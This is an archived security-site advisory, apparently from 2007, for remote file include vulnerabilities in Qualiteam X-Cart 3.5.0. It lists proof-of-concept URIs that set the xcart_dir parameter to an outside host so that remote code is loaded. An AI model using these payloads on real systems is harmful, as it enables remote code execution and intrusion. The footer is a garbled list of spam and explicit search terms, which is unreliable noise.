about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Qualiteam X-Cart xcart_dir Multiple Remote File Include Vulnerabilities


Title Qualiteam X-Cart xcart_dir Multiple Remote File Include Vulnerabilities
Published 2007-09-11-12:00AM
Updated 2007-09-12-07:31PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  aLiiF is credited with the discovery of these vulnerabilities.
Vulnerable  Qualiteam XCart 3.5 .0
Not Vulnerable  Qualiteam X-Cart 4.1.8
Code  An attacker can exploit these issues via a browser.The following proof-of-concept URIs are available:http://www.example.com/[xcart-path]/config.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/prepare.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/smarty.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/customer/product.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/provider/auth.php?xcart_dir=http://www.example2.com /[inject]?
http://www.example.com/[xcart-path]/admin/auth.php?xcart_dir=http://www.example2.com /[inject]?
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 22:00:00 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
imlive.com 2...n.com/ Girls+havi ass to ass Video 3gp luo-bin198 Nayanthara 2...n.com/ Pornograph 200 /compo xxxwwe.com www.rdczj. Memek anak Incest vid sexo gay 2...n.com/ www.018kdy http://www divo www.taobao facebook p phpbb 2.0. HOTSEXASIA 2...n.com/ 558200.net www.zhaobf csd www.zoorgi 2...n.com/ bedsex.com 726 Free naked gypsysexy 2...n.com/ Worldsex g sextoom co rajsthanne www..india wwww+89com Free naked keral hi.baidu.c 2...n.com/ gzdaikin.c www.boytee Disk 2...n.com/ www.sexvee 2.6.18& &a